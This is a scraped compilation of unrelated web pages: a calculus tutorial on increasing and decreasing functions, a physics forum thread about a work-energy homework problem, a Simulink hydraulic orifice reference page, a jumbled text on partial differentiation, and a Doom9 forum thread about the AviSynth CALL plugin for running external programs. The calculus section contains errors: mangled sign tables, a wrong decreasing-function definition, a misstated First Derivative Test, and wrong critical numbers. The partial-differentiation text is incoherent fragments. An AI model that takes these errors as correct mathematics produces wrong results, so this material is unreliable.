To determine where a function $f$ is increasing or decreasing, we begin by finding the critical numbers. These numbers divide the $x$-axis into intervals, and we test the sign of $f'(x)$ in each of these intervals. This procedure is often called the first derivative test and can be used to determine local extrema and intervals of monotonicity.
Definition. A function $f$ is called increasing on an interval $I$ if $f\left(x_1\right) < f\left(x_2\right)$ whenever $x_1<x_2$ on $I.$ A function $f$ is called decreasing on an interval $I$ if $f\left(x_1\right) > f\left(x_2\right)$ whenever $x_1>x_2$ on $I.$
Definition. A function $f$ is called monotonic on an interval $I$ if it is either increasing or decreasing on $I.$
Theorem. Suppose $f$ is continuous on $[a,b]$ and differentiable on $(a,b).$
(1) If $f'(x)>0$ for all $x$ in $(a,b),$ then $f$ is increasing on $(a,b).$
(2) If $f'(x)<0$ for all $x$ in $(a,b),$ then $f$ is decreasing on $(a,b).$
Example. Find where the function $$f(x)=3x^4-4x^3-12x^2+5$$ is increasing and decreasing; that is determine the intervals where $f$ is monotonic.
Solution. The derivative of $f$ is $$f'(x)=12x^3-12x^2-24x=12x(x-2)(x+1).$$ Since $f$ is continuous and differentiable, to test where the function is monotonic we divide the $x$-axis according to the sign of $f'(x)$ which depending on the signs of $12x,$ $x-2,$ and $x+1.$ We put our results into the following table: $$\begin{array}{c|c|c|c|c|l} \text{Interval} & 12x & x-2 & x+1 & f'(x)\text{ } & f \\ \hline x<-1 & – & – & – & – & \text{decreasing on } (-\infty ,-1) \\ -12 & + & + & + & + & \text{increasing on } (2,\infty ) \end{array}$$ as needed.
## The First Derivative Test
Theorem. (First Derivative Test) Suppose that $c$ is a critical number of a function that is continuous on $[a,b].$ Then the following statements hold:
(1) If $f'(x)>0$ on $(a,c)$ and $f'(x)<0$ on $(c,b),$ then $f$ has a relative (local) maximum at $c.$
(2) If $f'(x)<0$ on $(a,c)$ and $f'(x)>0$ on $(c,b),$ then $f$ has a relative (local) maximum at $c.$
(3) If neither hold then $f$ has no relative (local) extremum at $c.$
Example. Apply the First Derivative Test to find the local extrema of the function $$f(x)=x(1-x)^{2/5}$$ and sketch its graph.
Solution. First we find the critical numbers of $f$ by solving $f'(x)=0$ and determining where $f'(x)$ is undefined but $f(x)$ is defined. The derivative of $f$ is \begin{align*} f'(x) & =(1-x)^{2/5}+\frac{2x}{5}(1-x)^{-3/5}(-1) \\ & =\frac{5(1-x)-2x}{5(1-x)^{3/5}} \\ & =\frac{5-7x}{5(1-x)^{3/5}}. \end{align*} Solving $f'(x)=0$ we find $x=5/7.$ Also $f'(1)$ does not exist but $f(1)=0;$ and therefore the only critical numbers of $f$ are $x=5/7$ and $x=0.$ We determine the local extrema using the following table \begin{align*} \begin{array}{c|c|c|c|l} \text{Interval} & 5-7x & (1-x)^{3/5} & f'(x) & f(x) \\ \hline x<\frac{5}{7} & + & + & + & \text{ increasing on} \left(-\infty ,\frac{5}{7}\right) \\ \frac{5}{7}1 & – & – & + & \text{ increasing on }(1,+\infty ) \end{array} \end{align*} Therefore, $\left(\frac{5}{7},f\left(\frac{5}{7}\right)\right)$ is a local maximum and $(1,f(1))$ is a local minimum. Here is the graph of the function $f(x)=x(1-x)^{2/5}.$ Notice there is a corner at $(1,f(1))$ because $f$ is defined there but $f’$ is not.
## Finding Extrema
Example. Find the local and absolute extrema values of the function $$f(x)=x^3(x-2)^2$$ on the interval $-1\leq x\leq 3.$ Sketch the graph.
Solution. First we notice that $f$ is a polynomial and so is continuous and differentiable for all real numbers. Next we find the critical numbers of $f$ by solving $f'(x)=0$ and determining where $f'(x)$ is undefined, but $f(x)$ is defined. The derivative of $f$ is \begin{align*} f'(x) & =3x^2(x-2)^2+2x^3(x-2) \\ & =x^2(x-2)(5x-6). \end{align*} To find the critical numbers we set $f'(x)=0$ and obtain $x=0,2,6/5.$ We determine the local extrema and absolute extrema using the following table: \begin{align*} \begin{array}{c|c|c|c|c|l} \text{Interval} & x^2 & x-2 & 5x-6 & f'(x)\text{ } & f \\ \hline -1<x<0 & + & – & – & + & \text{ increasing on} (-1,0) \\ 0<x<\frac{6}{5} & + & – & – & + & \text{ increasing on } \left(0, \frac{6}{5}\right) \\ \frac{6}{5}<x<2 & + & – & + & – & \text{ decreasing on }\left(\frac{6}{5},2\right) \\ 2<x<3 & + & + & + & + & \text{ increasing on } (2,3) \end{array} \end{align*} The function $f$ does not have a local extrema at $x=0.$ The local maximum is $\left(\frac{6}{5},f\left(\frac{6}{5}\right)\right)$ and the local minimum is $(2,f(2)).$ Since $f$ is a continuous function we can use the extreme value theorem to determine absolute extrema. We compute the functional values at the endpoints, namely $f(-1)=-9$ and $f(3)=27.$ Therefore, the absolute maximum is $f(3)=27$ and the absolute minimum is $f(-1)=-9$.
## Exercises on Monotonic Functions
Exercise. For each of the following functions determine the critical points and apply the first derivative test to determine the intervals where the function is increasing or decreasing, and all local extrema.
$(1) \quad \displaystyle f(x)=(x-1)^2(x+2)$
$(2) \quad \displaystyle f(x)=(x-1)e^{-x}$
$(3) \quad \displaystyle f(x)=x^{-1/3}(x+2)$
$(4) \quad \displaystyle f(\theta )=3\theta ^2-4\theta ^3$
$(5) \quad \displaystyle h(r)=(r+7)^3$
$(6) \quad \displaystyle g(x)=x^2\sqrt{5-x}$
$(7) \quad \displaystyle f(x)=\frac{x^3}{3x^2+1}$
$(8) \quad \displaystyle h(x)=x^{1/3}\left(x^2-4\right)$
$(9) \quad \displaystyle f(x)=e^{2x}+e^{-x}$
$(10) \quad \displaystyle f(x)=x \ln x$
$(11) \quad \displaystyle f(x)=(x+1)^2$
$(12) \quad \displaystyle f(x)=-x^2-6x-9$
$(13) \quad \displaystyle k(x)=x^3+3x^2+3x+1$
Exercise. Sketch the graph of a differentiable function $y=f(x)$ through the point $(1,1)$ that satisfies the following conditions:
$(1) \quad f'(1)=0$
$(2) \quad f'(x)>0$ for $x<1$ \item $f'(x)<0$ for $x>1$
$(3) \quad f'(x)>0$ for $x\neq 1$
$(4) \quad f'(x)<0$ for $x\neq 1$
Exercise. Sketch the graph of a differentiable function $y=f(x)$ that satisfies the following condition.
(1) a local minimum at $(1,1)$
(2) a local maximum at $(3,3)$
(3) local maximum at $(1,1)$
(4) a local minimum at $(3,3)$
Exercise. Sketch the graph of a differentiable function $y=h(x)$ that satisfies all of the following conditions. $h(0)=0,$ for all $x$, $-2\leq h(x)\leq 2,$ $h'(x)\to +\infty$ as $x\to 0^-,$ and $h'(x)\to +\infty$ as $x\to 0^+.$
David Smith (Dave) has a B.S. and M.S. in Mathematics and has enjoyed teaching precalculus, calculus, linear algebra, and number theory at both the junior college and university levels for over 20 years. David is the founder and CEO of Dave4Math.
|
|
# Force, work, and energy problems
1. Jul 20, 2004
### Physicshelpneeded
Force, work, and energy problems!!
k im kind of pissed off because i just started getting the hang of this physics stuff and understanding everything going on with momentum, acceleration and velocity changes, etc...
but now that we moved on to forces, energy, and work, its been nothing but headaches for me .
for example, 1 question asks me....
A force acts on a 2.0 kg cart while the cart moves 1.2 m. the work done by the force during the motion is 3.0 J. When the force begins to act on the cart, the cart is already moving with a speed of 1.0 m/s.
(a) What is the kinetic energy of the cart at the end of the 1.2 m motion? show calculations, etc...
what i did for this was say E<i> was KE<i> and E<f> was KE<f> so i said KE<i> = KE<f> which makes no sense because if there is an extra force they cant be equal... can anyone help?!
(b) What is the speed of the cart at the end of the motion? Show calculations, etc...
(I could not answer this question because i dont know how to do part A)
SOMEONE HELP ME!!!!
THANKS!
2. Jul 20, 2004
### JohnDubYa
Energy is not conserved because a non-conservative force (the push force) acts on it. So $$KE_i \neq KE_f$$
KNOW YOUR WORK-ENERGY THEOREMS. In non-calcululs langauge (that is, for constant forces):
$$W_{\rm NC} = F_{\rm NC} d \cos(\theta) = \Delta E$$,
which says that the work done by a nonconservative force changes the total mechanical energy of an object by $$\Delta E$$.
For conservative forces,
$$W_{\rm C} = F_{\rm C} d \cos(\theta) = -\Delta ({\rm PE})$$
which says that the work done by a conservative force changes the total potential energy of an object by $$-\Delta ({\rm PE})$$.
So use the first work-energy theorem to find $$\Delta E$$. Since common sense says that
$$\Delta PE + \Delta KE = \Delta E$$
and $$\Delta PE = 0$$, then you should be able to find the change in kinetic energy of the object.
Last edited: Jul 20, 2004
3. Jul 20, 2004
### Physicshelpneeded
it looks like all the information u posted is factoral and important....but unfortunately im only in physics 1, lol...and we're not even getting close to what equations n stuff u just told me....u r telling me about change in energy and the question doesnt ask that, asks for energy at end motion or whatever....
the equations the professor gave in class were...
Work = force x displacement
K<i> + P<i> = K<f> + P<f>
KE = 1/2 mv^2
and finally PE = -mgh
with these equations ro something close to it, can someone help me out?
THANKS
4. Jul 21, 2004
### JohnDubYa
If you know the initial energy, then if you know the change in energy you will know the final energy. For any property (which we will call $$P$$),
$$P_i + \Delta P = P_f$$
NO, only if there is no work being done by non-conservative forces. And in the example you provided, there is work being done by a non-conservative force.
Equations must be considered within their context. You simply cannot use the conservation-of-energy equation in the problem you provided because total mechanical energy is not conserved.
So the initial energy is not the same as the final energy. In fact, the final energy is greater than the initial energy. By how much? According to the work-energy theorem I wrote, by the amount of work done by the non-conservative force.
So fine this work by multiplying the force times the displacement. Add your result to the initial energy and you will obtain the final energy.
(BTW, your instructor is assuming that the force and displacement act along the same line, thus eliminating the cosine term in the definition of work.)
5. Jul 21, 2004
### ArmoSkater87
First list out what u know, it always helps me when I do.
$$m=2kg$$
$$d=1.2m$$
$$W=3J$$
$$V_0=1m/s$$
Now figure out how fast the cart accelerates
$$F=ma, W=Fd=mad$$
$$3J=(2kg)(a)(1.2m)$$
$$a=1.25m/s^2$$
Now use a constant acceleration equation to find the speed at the end.
$$V^2 = V_0^2 + 2ad$$
$$V^2 = (1m/s)^2 + (2)(1.25m/s^2)(1.2m)$$
$$V = 2m/s$$
Now figure out its KE at that speed.
$$KE = (1/2)mv^2 = (1/2)(2kg)(2m/s)^2$$
$$KE = 4J$$
Last edited: Jul 21, 2004
6. Jul 21, 2004
### JohnDubYa
Armo, the problem appears to have been set up for a work-energy solution. And besides, the work-energy solution is much, much easier than using acceleration.
7. Jul 21, 2004
### ArmoSkater87
Well, i dont know, as long as i got the answer right
8. Jul 21, 2004
### JohnDubYa
AFAICT, your solution is fine. But I think the teacher wants the student to be able to use the work-energy theorems. So using acceleration would defeat the purpose.
9. Jul 25, 2004
### pnaj
Hey 'Physicshelpneeded', I've only just seen your thread, so this might be too late for your assignment, but anyway ...
Did your teacher talk about the Work-Energy Theorem? It says: The total work done is equal to the change in kinetic energy. So, $Work = KE_{final} - KE_{initial}$.
If you haven't come across this yet, you have to go the hard way, which is what 'ArmoSkater87' did. The fact that the question gave you a distance almost tells you that this is probably the case, because you wouldn't actually need this information for the W-E Theorem.
Just supposing he did mention the Work-Energy Theorem, it's much simpler. The only other equation you need is the definition of kinetic energy: $KE = (1/2)mv^{2}$.
Part (a) asks for the final kinetic energy. Now, we are given the work, the mass and the initial speed, so writing out the W-E thm in terms of known variables (and using the defn of KE), we get $Work = KE_{final} - (1/2)mv_{initial}^{2}$. A little re-arranging and plugging-in of values will give you the answer.
Part (b) then asks you for the final speed. Since you now know, from part (a), the value of the final KE, you can use the defn of KE again to get the final speed, since $KE_{final} = (1/2)mv_{final}^{2}$.
Notice that, we didn't need to know anything about the nature of the force acting on the cart at all. Was it conservative or not? Doesn't matter! Was it gravity, or friction or something combination of forces? Doesn't matter!
All we were given the work done, the mass and an initial speed. This is the beauty of the Work-Energy Theorem.
Hope that helps!
10. Jul 26, 2004
### KnowledgeIsPower
Work = Force x Distance.
3 = Force x 1.2
3/1.2 = Force.
Force = 2.5N
As we are have no detail of any coefficient of friction or incline we are to assume energy is conserved.
Thus, KE at start = .5(2x1) = 1J
KE at end = 1J + 3J = 4J. (1J originally and an extra 3J inputted. Energy has not been spent on work against friction or an incline).
KE at end = 4J
4J KE at end.
KE = 0.5mv^2
4 = .5x2xV^2
4=v^2
V=2m/s
|
|
# Fixed Orifice
Hydraulic orifice with constant cross-sectional area
Orifices
## Description
The Fixed Orifice block models a sharp-edged constant-area orifice, flow rate through which is proportional to the pressure differential across the orifice. The flow rate is determined according to the following equations:
`$q={C}_{D}\cdot A\sqrt{\frac{2}{\rho }}\cdot \frac{p}{{\left({p}^{2}+{p}_{cr}^{2}\right)}^{1/4}}$`
`$\Delta p={p}_{\text{A}}-{p}_{\text{B}},$`
where
q Flow rate p Pressure differential pA, pB Gauge pressures at the block terminals CD Flow discharge coefficient A Orifice passage area ρ Fluid density pcr Minimum pressure for turbulent flow
The minimum pressure for turbulent flow, pcr, is calculated according to the laminar transition specification method:
• By pressure ratio — The transition from laminar to turbulent regime is defined by the following equations:
pcr = (pavg + patm)(1 – Blam)
pavg = (pA + pB)/2
where
pavg Average pressure between the block terminals patm Atmospheric pressure, 101325 Pa Blam Pressure ratio at the transition between laminar and turbulent regimes (Laminar flow pressure ratio parameter value)
• By Reynolds number — The transition from laminar to turbulent regime is defined by the following equations:
`${p}_{cr}=\frac{\rho }{2}{\left(\frac{{\mathrm{Re}}_{cr}\cdot \nu }{{C}_{D}\cdot {D}_{H}}\right)}^{2}$`
`${D}_{H}=\sqrt{\frac{4A}{\pi }}$`
where
DH Orifice hydraulic diameter ν Fluid kinematic viscosity Recr Critical Reynolds number (Critical Reynolds number parameter value)
The block positive direction is from port A to port B. This means that the flow rate is positive if it flows from A to B, and the pressure differential is determined as $\Delta p={p}_{\text{A}}-{p}_{\text{B}},$.
## Variables
Use the Variables tab to set the priority and initial target values for the block variables prior to simulation. For more information, see Set Priority and Initial Target for Block Variables.
## Basic Assumptions and Limitations
• Fluid inertia is not taken into account.
## Parameters
Orifice area
Orifice passage area. The default value is `1e-4` m^2.
Flow discharge coefficient
Semi-empirical parameter for orifice capacity characterization. Its value depends on the geometrical properties of the orifice, and usually is provided in textbooks or manufacturer data sheets. The default value is `0.7`.
Laminar transition specification
Select how the block transitions between the laminar and turbulent regimes:
• `Pressure ratio` — The transition from laminar to turbulent regime is smooth and depends on the value of the Laminar flow pressure ratio parameter. This method provides better simulation robustness.
• `Reynolds number` — The transition from laminar to turbulent regime is assumed to take place when the Reynolds number reaches the value specified by the Critical Reynolds number parameter.
Laminar flow pressure ratio
Pressure ratio at which the flow transitions between laminar and turbulent regimes. The default value is `0.999`. This parameter is visible only if the Laminar transition specification parameter is set to ```Pressure ratio```.
Critical Reynolds number
The maximum Reynolds number for laminar flow. The value of the parameter depends on the orifice geometrical profile. You can find recommendations on the parameter value in hydraulics textbooks. The default value is `12`, which corresponds to a round orifice in thin material with sharp edges. This parameter is visible only if the Laminar transition specification parameter is set to `Reynolds number`.
## Global Parameters
Parameters determined by the type of working fluid:
• Fluid density
• Fluid kinematic viscosity
Use the Hydraulic Fluid block or the Custom Hydraulic Fluid block to specify the fluid properties.
## Ports
The block has the following ports:
`A`
Hydraulic conserving port associated with the orifice inlet.
`B`
Hydraulic conserving port associated with the orifice outlet.
## Extended Capabilities
### C/C++ Code GenerationGenerate C and C++ code using Simulink® Coder™.
Introduced in R2006a
Get trial now
|
|
The Chain Rule 5. Follow 1,217 views (last 30 days) manish sharma on 23 Nov 2011. Unless otherwise stated, all functions are functions of real numbers that return real values; although more generally, the formulae below apply wherever they are well defined — including the case of complex numbers ().. Differentiation is linear. Such a function can be studied by holding all variables except one constant and observing its variation with respect to one single selected variable. The elliptic/parabolic/hyperbolic classification provides a guide to appropriate initial and boundary conditions and to the smoothness of the solutions. Gradient is a vector comprising partial derivatives of a function with regard to the variables. 1 ⋮ Vote. The same principle can be observed in PDEs where the solutions may be real or complex and additive. This is a reflection of the fact that they are not, in any immediate way, both special cases of a "general solution formula" of the Laplace equation. ∂ Example 2. 1 1 1 x x 1 x + 1 are its partial … {\displaystyle u(x,0)=f(x)} If the data on S and the differential equation determine the normal derivative of u on S, then S is non-characteristic. The solution approach is based either on eliminating the differential equation completely (steady state problems), or rendering the PDE into an approximating system of ordinary differential equations, which are then numerically integrated using standard techniques such as Euler's method, Runge–Kutta, etc. Multiplying with 8.10 Numerical Partial Differentiation Partial differentiation 2‐D and 3‐D problem Transient condition Rate of change of the value of the function with respect to … SOLUTION OF STANDARD TYPES OF FIRST ORDER PARTIAL. Remember that you’ll need to rewrite the terms so that each of the $$t$$’s are in the numerator with negative exponents before taking the derivative. The Rules of Partial Differentiation 3. Partial Derivative Calculator A step by step partial derivatives calculator for functions in two variables. you are probably on a mobile phone).Due to the nature of the mathematics on this site it is best views in landscape mode. 1) u = f(x, y, z, p, q, ... ) of several variables. Ordinary differential equations form a subclass of partial differential equations, corresponding to functions of a single variable. Note that a function of three variables does not have a graph. The classification depends upon the signature of the eigenvalues of the coefficient matrix ai,j. , Elementary rules of differentiation. ‖ The Rest 75. Step 3: Multiply through by the bottom so we no longer have fractions. Poisson formula for a ball 64 5. There are no generally applicable methods to solve nonlinear PDEs. Separable PDEs correspond to diagonal matrices – thinking of "the value for fixed x" as a coordinate, each coordinate can be understood separately. {\displaystyle u} Free partial derivative calculator - partial differentiation solver step-by-step This website uses cookies to ensure you get the best experience. And the negative sign in Equation [2] simply negates each of the components. ‖ ) Since we are treating y as a constant, sin(y) also counts as a constant. For the partial derivative with respect to h we hold r constant: f’ h = π r 2 (1)= π r 2 (π and r 2 are constants, and the derivative of h with respect to h is 1) It says "as only the height changes (by the tiniest amount), the volume changes by π r 2 " It is like we add the thinnest disk on top with a circle's area of π r … ‖ So x, y, a point in two dimensional plane belongs to D, where D is an open set in R2, our cartesian plane. Partly due to this variety of sources, there is a wide spectrum of different types of partial differential equations, and methods have been developed for dealing with many of the individual equations which arise. This is a linear partial differential equation of first order for µ: Mµy −Nµx = µ(Nx −My). For example: In the general situation that u is a function of n variables, then ui denotes the first partial derivative relative to the i'th input, uij denotes the second partial derivative relative to the i'th and j'th inputs, and so on. The aforementioned Calculator computes a derivative of a certain function related to a variable x utilizing analytical differentiation. 2 Sometimes a function of several variables cannot neatly be written with one of the variables isolated. is a constant and Even more phenomena are possible. When applying partial differentiation it is very important to keep in mind, which symbol is the variable and which ones are the constants. Computational solution to the nonlinear PDEs, the split-step method, exist for specific equations like nonlinear Schrödinger equation. x This corresponds to diagonalizing an operator. 0 superposition Formula Sheet of Derivates includes numerous formulas covering derivative for constant, trigonometric functions, hyperbolic, exponential, logarithmic functions, polynomials, inverse trigonometric functions, etc. This context precludes many phenomena of both physical and mathematical interest. Entropy and Partial Differential Equations Lawrence C. Evans Department of Mathematics, UC Berkeley InspiringQuotations A good many times Ihave been present at gatherings of people who, by the standards of traditional culture, are thought highly educated and who have with considerable gusto been expressing their incredulity at the illiteracy of scientists. As such, it is usually acknowledged that there is no "general theory" of partial differential equations, with specialist knowledge being somewhat divided between several essentially distinct subfields.[1]. Elliptic, parabolic, and hyperbolic partial differential equations of order two have been widely studied since the beginning of the twentieth century. You appear to be on a device with a "narrow" screen width (i.e. If n = 1, the graph of f (x) = x is the line y = x Mathematicians usually write the variable as x or y and the constants as a, b or c but in Physical Chemistry the symbols are different. (viii) Differentiation of Integrable Functions If g 1 (x) and g 2 (x) are defined in [a, b], Differentiable at x ∈ [a, b] and f(t) is continuous for g 1 (a) ≤ f(t) ≤ g 2 (b), then. 1. {\displaystyle x=b} For virtually all functions ƒ ( x, y) commonly encountered in practice, ƒ vx ; that is, the order in which the derivatives are taken in the mixed partials is immaterial. (This is separate from Asymptotic homogenization, which studies the effects of high-frequency oscillations in the coefficients upon solutions to PDEs. = ���@Yٮ�5]�>]X�U�[�ȱ����""��uH��h��{��+���47 � �@�'zp\$p��H���. In contrast to the earlier examples, this PDE is nonlinear, owing to the square roots and the squares. Ultrahyperbolic: there is more than one positive eigenvalue and more than one negative eigenvalue, and there are no zero eigenvalues. One says that a function u(x, y, z) of three variables is "harmonic" or "a solution of the Laplace equation" if it satisfies the condition, Such functions were widely studied in the nineteenth century due to their relevance for classical mechanics. This is analogous in signal processing to understanding a filter by its impulse response. where the coefficients A, B, C... may depend upon x and y. If f is zero everywhere then the linear PDE is homogeneous, otherwise it is inhomogeneous. For the Laplace equation, as for a large number of partial differential equations, such solution formulas fail to exist. Maxima and minima 8. Looks very similar to the formal definition of the derivative, but I just always think about this as spelling out what we mean by partial Y and partial F, and kinda spelling out why it is that the Leibniz's came up with this notation in the first place. endobj For example, @w=@x means difierentiate with respect to x holding both y and z constant and so, for this example, @w=@x = sin(y + 3z). We can also represent dy/dx = D x y. This technique rests on a characteristic of solutions to differential equations: if one can find any solution that solves the equation and satisfies the boundary conditions, then it is the solution (this also applies to ODEs). The section also places the scope of studies in APM346 within the vast universe of mathematics. The aim of this is to introduce and motivate partial di erential equations (PDE). A partial di erential equation (PDE) is an equation involving partial deriva-tives. Existence and regularity for −∆u+u= f on Tn 65 6. Partial Differential Equations; Linear Differential Equations; Non-linear differential equations; Homogeneous Differential Equations ; Non-homogenous Differential Equations; Different Differentiation Formulas for Calculus. No class November 12. ≤ is not. If a hypersurface S is given in the implicit form. {\displaystyle \alpha \neq 0} Differentiation Under the Integral Sign. There is only a limited theory for ultrahyperbolic equations (Courant and Hilbert, 1962). The superposition principle applies to any linear system, including linear systems of PDEs. First, differentiating ƒ with respect to x … For instance. DIFFERENTIATION UNDER THE INTEGRAL SIGN. For example, for a function u of x and y, a second order linear PDE is of the form, where ai and f are functions of the independent variables only. This is possible for simple PDEs, which are called separable partial differential equations, and the domain is generally a rectangle (a product of intervals).
|
|
Welcome to Doom9's Forum, THE in-place to be for everyone interested in DVD conversion. Before you start posting please read the forum rules. By posting to this forum you agree to abide by the rules.
Doom9's Forum CALL command
Register FAQ Calendar Search Today's Posts Mark Forums Read
28th March 2003, 14:43 #41 | Link DDogg Retired, but still around Join Date: Oct 2001 Location: Lone Star Posts: 3,058 Sh0dan, Nic, anybody that might know, a theory question: Main question - In theory would it be possible for the call command to do multiple tasks while it is in an active state? Not to distract from the main question and just as a poor example: Say we had a separate file called dothis.call with several actions and execute it with: call(blankclip,"execute d:\dothis.call","-2") Contents of external file named "dothis.call" (or marked in a script something like a function?) dothis.call # whatever multiple avisynth keywords/actions NicEcho.exe output some variables Import something using avisynth import command internal variable=imported variable end Last edited by DDogg; 28th March 2003 at 15:27.
28th March 2003, 15:47 #42 | Link Bidoche Avisynth 3.0 Developer Join Date: Jan 2002 Location: France Posts: 639 won't Import("mycalls.avs") do the job ?
28th March 2003, 15:54 #43 | Link DDogg Retired, but still around Join Date: Oct 2001 Location: Lone Star Posts: 3,058 er, I am not too swift at this, but I did not think the call command would do an internal command? The import command would have to be done within the call command to cause import to activate at the prescribed place in the video event. I will see if I can figure it out and try. If you have an example in mind it would be appreciated. /edit After quite a few experiments I do not think it is possible to execute a avisynth internal command like Import from within the CALL command. If I find out different I'll update. Still looking for "Main question - In theory would it be possible for the call command to do multiple tasks while it is in an active state?", Bidoche? Last edited by DDogg; 29th March 2003 at 01:46.
29th March 2003, 11:44 #44 | Link bilu Registered User Join Date: Oct 2002 Location: Portugal Posts: 1,182 Hi Ddogg, I'm still trying to figure out what you want, but please confirm me if it is this: (from an old example ) INFO.BAT ========= del c:\info.avs for /F "usebackq" %%i IN (time /t) DO @echo Time=%%i > c:\info.avs for /F "usebackq" %%i IN (date /t) DO @echo Date=%%i >> c:\info.avs In AVS script ============== CALL(BlankClip,"c:\info.bat","49") Import("c:\info.avs",50) --> would import at frame 50 ? I don't know if the script would stop rendering until the CALL command finishes ... it could be the only way to know if it would be safe to import a generated script at a specific time. Also the Import command seems to load the script to generate the filter graph at start, but it should be possible (Bidoche? ) to modify Import (or use within a funtion that could be applied to a certain frame range, don't know if that's possible) to load an imported script at a specific frame. Best regards, Bilu
29th March 2003, 12:28 #45 | Link Nic Moderator Join Date: Oct 2001 Location: England Posts: 3,285 The parameter passed to Call.dll is just a string, and that string is taken as the main parameter to call CreateProcess with. By giving it an avs file, all that would happen is the avs file would be run and probably Windows Media Player would pop up Ill think about the best way of outputing the full elapsed time, the script idea could get complex Ill also start to play with the Invoke command in avisynth soon. Cheers, -Nic
9th July 2004, 21:01 #47 | Link enterprise Registered User Join Date: Jul 2004 Posts: 6 Call command Hi, nic. I checked your Call Plugin and I think it's amazing! It's exactly what I was looking for. However I have to reload the avi everytime because once Call command is launched it's not launched anymore until I reload the avi. I think it's because Cache but I don't know how can I fix it. I think that if I compile again AviSynth with a different cache value it would work but I don't know how it could be compiled and also I would want that Call plugin would work on a standar Avisynth. Could you help me?
9th July 2004, 21:24 #48 | Link stickboy AviSynth Enthusiast Join Date: Jul 2002 Location: California, U.S. Posts: 1,267 Exactly what do you want to do? Call is invoked when the script is loaded, not on a per-frame-basis or anything like that. Edit: Okay, I don't know what I'm talking about it. I obviously haven't used Call in awhile and had forgotten it does per-frame-stuff. Last edited by stickboy; 10th July 2004 at 09:03.
10th July 2004, 08:11 #49 | Link enterprise Registered User Join Date: Jul 2004 Posts: 6 Thank you for your reply! I want to execute an external command at specific frame even if I play several times the AVI. Call("c:\Command.exe", "100") If I open AVI with Mediaplayer, call command is executed only 1 time at frame 100. but if I play again the AVI, the command is not executed. I am looking for a way to solve it.
22nd December 2011, 08:34 #50 | Link vampiredom Registered User Join Date: Aug 2008 Posts: 233 Reviving this ancient thread... Is this any way to send an apostrophe (') inside an argument without CALL_25.dll converting it to a double quote (")? I've tried \' and everything I could think of but no luck.
25th December 2011, 22:04 #51 | Link
Chikuzen
typo lover
Join Date: May 2009
Posts: 595
Quote:
Originally Posted by vampiredom Reviving this ancient thread... Is this any way to send an apostrophe (') inside an argument without CALL_25.dll converting it to a double quote (")? I've tried \' and everything I could think of but no luck.
on DOS-prompt, escape sequence is not \ but ^
__________________
my repositories
26th December 2011, 03:03 #52 | Link
vampiredom
Registered User
Join Date: Aug 2008
Posts: 233
Quote:
on DOS-prompt, escape sequence is not \ but ^
Nope. Doesn't work either. I believe CALL_25.dll was made to internally translate single-quotes to double-quotes; to make it easier for people to send long strings as arguments without having to triple-quote things in AviSynth. This works great – except, of course, when you want to include single-quotes in the string!
26th December 2011, 13:55 #53 | Link
Gavino
Avisynth language lover
Join Date: Dec 2007
Location: Spain
Posts: 3,420
Quote:
Originally Posted by vampiredom I believe CALL_25.dll was made to internally translate single-quotes to double-quotes; to make it easier for people to send long strings as arguments without having to triple-quote things in AviSynth.
Looking through the thread (original was before my time), it seems people were unaware you could use triple-quotes, or perhaps that facility didn't exist back then. Anyway, I've had a look at the CALL source code and it always translates single-quotes to double-quotes - unfortunately, there is no escape mechanism, so the implementation is badly conceived.
__________________
GScript and GRunT - complex Avisynth scripting made easier
26th December 2011, 19:53 #54 | Link
vampiredom
Registered User
Join Date: Aug 2008
Posts: 233
Quote:
it always translates single-quotes to double-quotes - unfortunately, there is no escape mechanism, so the implementation is badly conceived
Yeah, unfortunate. I think I will write a "partner" .exe for CALL_25.dll that allows some kind of escape mechanism. Perhaps I could use ^x, followed by a hex character code. (so that ' would be ^x27). Does that sound like a reasonable workaround for this issue?
30th December 2011, 21:45 #55 | Link vampiredom Registered User Join Date: Aug 2008 Posts: 233 CALL_25_Helper Download OK, I made this little "helper" app to allow single-quotes (and just about any other funky chars, theoretically) to be passed via CALL_25.dll The following chars need to be escaped, like such: Code: ^ -> ^x5E ' -> ^x27 \ -> ^x5C " -> ^x22 These are then unescaped by my .exe There is also its buddy-function for AviSynth, CALL_25_Helper(), which does the escaping automatically. Code: # Modify the CALL_25_Helper_Dir variable to contain the path to CALL_25_Helper.exe # This path should end with a trailing slash (or backslash) # example: # global CALL_25_Helper_Dir = "C:/Program Files (x86)/AviSynth 2.5/plugins/" global CALL_25_Helper_Dir = "" # CALL_25_Helper() # Usage examples: # CALL_25_Helper("c:\path\to\foo.exe", "argument1 argument2 argument3") # CALL_25_Helper("c:\path\to\bar.exe", """-a "quoted string #1" -b "quoted string #2"""") Note that you need to define the global CALL_25_Helper_Dir so that CALL_25 can find the helper .exe ... so either modify the line in the .avsi or include the "global" statement in the top of your script: Code: global CALL_25_Helper_Dir = "C:\Program Files (x86)\AviSynth 2.5\plugins\" **EDIT** Note: In reality, only the ' and " chars truly need to be escaped. The reason ^ gets escaped is to avoid any confusion with the escape sequence (though this is improbable). The \ gets escaped only because my .exe will sometimes interpret it as an escape char when passed inside of an argument (such as the case of \", which would be an escaped quote). Safety first. Last edited by vampiredom; 31st December 2011 at 04:29. Reason: clarification of the escape sequences
31st December 2011, 04:14 #56 | Link vampiredom Registered User Join Date: Aug 2008 Posts: 233 Another interesting thing about the CALL_25_Helper ... Since the command is ultimately being executed by the CALL_25_Helper.exe (instead of directly by CALL_25.dll) it now possible to execute system commands ... and you can omit the full path when the the executable is in the system path. A simple example: Code: # Open up a Windows Explorer window @ drive d: from AviSynth CALL_25_Helper("explorer", "d:") Nifty. Last edited by vampiredom; 31st December 2011 at 04:23.
15th July 2012, 19:38 #57 | Link martin53 Registered User Join Date: Mar 2007 Posts: 407 Hi nic, vampiredom or anyone interested and capable of doing this, is there anyone who likes to help me with this idea: - Add a clip parameter to call, and make the call plugin first copy the current frame to the clipboard before executing the command - allow call to execute the command with every frame - wait for the command to finish, then copy the clipboard content to the return clip (you got it: the command changed the frame in the clipboard) - maybe add another clip parameter which gives the assumed return clip properties for the graph creation phase of the AviSynth script The use case I have in mind is to call ImageMagick operations inside an AviSynth script. Even if it might me slow, all available ImageMagick operations would be accessible at one stroke. I am specifically interested in the fourier and other transform features, which are slow anyway. The command would be the ImageMagick script, of course, that would start and end reading/writing the clipboard. Just to allow the command to change the dimensions or other clip properties, it would be useful to give the extended call plugin the 2nd clip as prototype for ImageMagick's return data. Last edited by martin53; 15th July 2012 at 19:55.
15th July 2012, 19:55 #58 | Link um3k Registered User Join Date: May 2007 Posts: 220 I wonder if it would be better to use stdin and stdout instead of the clipboard?
